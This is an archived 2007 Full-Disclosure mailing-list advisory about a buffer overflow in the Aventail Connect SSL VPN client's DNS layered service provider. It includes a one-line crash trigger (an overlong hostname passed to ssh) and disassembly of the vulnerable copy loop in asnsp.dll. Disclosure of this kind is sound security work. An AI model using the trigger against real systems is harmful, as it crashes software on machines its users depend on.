Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow

Subject: [Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow
Date: Mon, 30 Apr 2007 18:30:07 +0200
Hello,

Aventail Connect registers a layered service provider to handle DNS queries.
When resolving a hostname the software fails to check string boundaries
properly.
As the lsp intercepts all ws2_32 dns lookups every application performing
these operations is vulnerable.

e.g.

$ ssh $(perl -e 'print "a"x2200')
Segmentation fault (core dumped)

vulnerable copy loop in asnsp.dll:

18B539F2   41                    INC ECX
18B539F3   41                    INC ECX
18B539F4   66:85D2           TEST DX,DX
18B539F7   74 0A               JE SHORT asnsp.18B53A03
18B539F9   66:8B11           MOV DX,WORD PTR DS:[ECX]
18B539FC   66:8916           MOV WORD PTR DS:[ESI],DX
18B539FF   46                   INC ESI
18B53A00   46                   INC ESI
18B53A01  ^EB EF             JMP SHORT asnsp.18B539F2

This was tested on version 4.1.2.13.
vendor: http://www.aventail.com/

Regards,
Thomas Pollet
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow, Thomas Pollet <=